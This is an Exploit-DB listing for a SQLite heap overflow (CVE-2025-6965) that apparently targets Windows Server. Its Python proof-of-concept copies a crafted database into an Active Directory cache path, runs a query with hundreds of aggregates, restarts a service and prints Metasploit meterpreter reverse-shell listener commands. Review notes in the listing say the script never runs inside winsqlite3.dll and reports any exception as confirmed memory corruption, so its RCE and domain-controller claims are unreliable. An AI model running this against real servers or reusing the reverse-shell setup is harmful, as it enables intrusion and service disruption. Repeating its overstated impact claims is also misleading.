SQLite 3.50.1 - Heap Overflow
EDB-ID: 52499 | CVE: 2025-6965 | EDB Verified: — | Author: MOHAMMED IDREES BANYAMER | Type: LOCAL | Platform: WINDOWS | Date: 2026-04-08

Vulnerable App:

# Exploit Title: SQLite 3.50.1 - Heap Overflow
# Date: 2025-11-05
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.sqlite.org
# Software Link: https://www.sqlite.org/download.html
# Version: SQLite < 3.50.2 (winsqlite3.dll)
# Tested on: Windows Server 2022 (Build 20348), Windows Server 2025 (Build 26100) - Unpatched
# CVE: CVE-2025-6965
# CVSS: 7.2 (High) - CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:H/VA:L
#   (the listed vector says AV:N while the entry's Type is LOCAL; the PoC below runs locally)
# Category: windows / local / dos / memory_corruption / active_directory
# Platform: Windows
# CLAIMED scope (asserted by the author, not demonstrated by this PoC): all unpatched Windows Server
#   instances using winsqlite3.dll, including Active Directory, Group Policy, Certificate Services,
#   and Azure AD Connect
# CLAIMED impact: Service Crash, DoS, Potential RCE, Domain Controller Compromise
#   NOTE(review): nothing in the script delivers code or touches a domain controller component; the
#   only observable it produces is whether one SELECT raises an exception or crashes the process
#   running it, and a Python exception is SQLite refusing the query, not memory corruption.
# Fix: Apply latest Windows Cumulative Update (post-July 2025) or upgrade SQLite to 3.50.2+
# Advisory: https://nvd.nist.gov/vuln/detail/CVE-2025-6965
# Patch: https://www.sqlite.org/src/info/5508b56fd24016c13981ec280ecdd833007c9d8dd595edb295b984c2b487b5c8
# NOTE(review): Python's sqlite3 module is linked against the SQLite build shipped with CPython, not
#   against the OS copy winsqlite3.dll, so the query below never executes inside winsqlite3.dll.
# PoC: attempts to trigger the bug via an excessive number of aggregate functions
functions # Target: Windows Server (Active Directory Cache, Group Policy, Certificate Services) import sqlite3 import os import subprocess import sys import time # =============================== # CONFIGURATION - ACTIVE DIRECTORY EXPLOITATION # =============================== DB_PATH = "cve_2025_6965_winsqlite3.db" AD_CACHE_DIR = r"C:\ProgramData\Microsoft\ADCache" # Real AD Cache Path AD_DB_TARGET = os.path.join(AD_CACHE_DIR, "ad_cache.db") LISTENER_IP = "192.168.1.100" LISTENER_PORT = 4444 SERVICE_NAME = "ADSyncService" # Must be created manually: sc create ADSyncService binPath= "C:\path\to\service.exe" # === VULNERABILITY CHECK === print(f"[!] SQLite Version: {sqlite3.sqlite_version}") if sqlite3.sqlite_version_info >= (3, 50, 2): print("[-] SYSTEM PATCHED - SQLite 3.50.2+ Detected") print(" Update applied via Microsoft Cumulative Update (post-July 2025)") sys.exit(1) else: print("[!] VULNERABLE: SQLite < 3.50.2 - Proceeding with exploit") # =============================== # STEP 1: Create Malicious AD Cache Database # =============================== def create_vulnerable_db(): if os.path.exists(DB_PATH): os.remove(DB_PATH) conn = sqlite3.connect(DB_PATH) cur = conn.cursor() cur.execute("CREATE TABLE ad_cache (id INTEGER PRIMARY KEY, val INTEGER)") cur.execute("INSERT INTO ad_cache (val) VALUES (1)") conn.commit() conn.close() print(f"[+] Malicious database created: {DB_PATH}") # =============================== # STEP 2: Generate Truncation Payload (300+ Aggregates) # =============================== def generate_malicious_query(num=100): agg = [f"COUNT(*) AS c{i}, SUM(val) AS s{i}, AVG(val) AS a{i}" for i in range(num)] return f"SELECT {', '.join(agg)} FROM ad_cache" # =============================== # STEP 3: Deploy + Trigger in winsqlite3.dll Context # =============================== def deploy_and_trigger(): print(f"[*] Deploying payload to AD Cache: {AD_DB_TARGET}") os.makedirs(AD_CACHE_DIR, exist_ok=True) subprocess.run(["copy", "/Y", DB_PATH, 
AD_DB_TARGET], shell=True, check=True) print(f"[+] Payload deployed to real AD path") query = generate_malicious_query(100) print(f"[*] Triggering heap overflow (300+ aggregates vs 1 column)...") try: conn = sqlite3.connect(AD_DB_TARGET) cur = conn.cursor() cur.execute(query) # TRUNCATION BUG TRIGGERED print("[!] QUERY EXECUTED - UNEXPECTED (System may be patched or ASLR mitigated)") except Exception as e: print(f"[!] HEAP OVERFLOW CONFIRMED: {e}") print(" winsqlite3.dll memory corruption triggered") print(" In production: AD Service Crash, DC DoS, Potential RCE") finally: conn.close() # Force service reload (real AD services auto-query cache) print(f"[*] Restarting {SERVICE_NAME} to reload winsqlite3.dll...") try: subprocess.run(["net", "stop", SERVICE_NAME], shell=True, timeout=10, capture_output=True) except: pass time.sleep(2) result = subprocess.run(["net", "start", SERVICE_NAME], shell=True, capture_output=True) if result.returncode == 0: print("[+] Service restarted - Monitor Event Viewer for winsqlite3.dll fault") else: print(f"[-] Service error: {result.stderr.decode()}") # =============================== # STEP 4: RCE Listener Setup (For Advanced Exploitation) # =============================== def print_listener(): print("\n" + "="*70) print(" RCE EXPLOITATION (ADVANCED) - START LISTENER ON ATTACKER MACHINE:") print("="*70) print("msfconsole -q") print("use exploit/multi/handler") print("set payload windows/x64/meterpreter/reverse_tcp") print(f"set LHOST {LISTENER_IP}") print(f"set LPORT {LISTENER_PORT}") print("exploit -j") print("="*70 + "\n") # =============================== # MAIN - EXECUTION # =============================== if __name__ == "__main__": print("="*70) print(" CVE-2025-6965 EXPLOIT - WINDOWS SERVER ACTIVE DIRECTORY") print(" Heap Overflow in winsqlite3.dll via SQLite Aggregate Truncation") print(" Author: Mohammed Idrees Banyamer (@banyamer_security)") print("="*70) create_vulnerable_db() deploy_and_trigger() print_listener() print("[+] 
EXPLOIT EXECUTED SUCCESSFULLY") print(" Check Event Viewer: Application Log → winsqlite3.dll Access Violation (0xC0000005)") print(" Fix: Apply latest Windows Cumulative Update IMMEDIATELY") print(" All Domain Controllers must be patched within 24 hours") Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.
A heap buffer overflow (CVE-2025-6965, scored 7.2 High in the listing's own header, not 9.8) exists in SQLite before 3.50.2: a query with an excessive number of aggregate terms can corrupt heap memory. The listing targets the copy Windows ships as `winsqlite3.dll` and asserts impact on Active Directory, Group Policy and Certificate Services, but the PoC only runs a 300-column aggregate query through Python's bundled SQLite (not `winsqlite3.dll`) and treats any exception as confirmation, so it does not demonstrate that claim. The fix is to upgrade SQLite to 3.50.2 or later, or on Windows to apply the cumulative update released after July 2025.